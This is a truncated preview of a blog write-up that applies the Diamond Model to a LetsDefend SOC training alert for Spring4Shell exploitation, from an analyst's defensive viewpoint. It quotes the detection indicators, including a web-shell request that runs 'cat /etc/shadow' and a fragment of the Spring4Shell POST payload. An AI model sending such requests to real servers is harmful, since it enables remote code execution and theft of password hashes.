Sitemap

Member-only story

Diamond Model of Intrusion Analysis in Practice

3 min readMay 30, 2022

--

LetsDefend: SOC171-Spring4Shell

Diamond Model

Log Analysis

EventID 121
SOC171 — Spring4Shell Activity

Spring4Shell 0-Day Vulnerability is a Remote Code Execution (RCE) vulnerability. According to public information, a successful exploitation would enable the Threat Actors to have arbitrary file upload privilege.

Suspicious parameter & detection rules triggered:

  • /tomcatwar.jsp?pwd=j&cmd=cat%20/etc/shadow
  • java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di payload in POST data
Affected SpringServer
Log Analysis

An attacker has conducted port scanning and then tried to exploit the service on port 8082 with the “Spring4Shell” vulnerability. Assuming the attack…

--

--

Responses (1)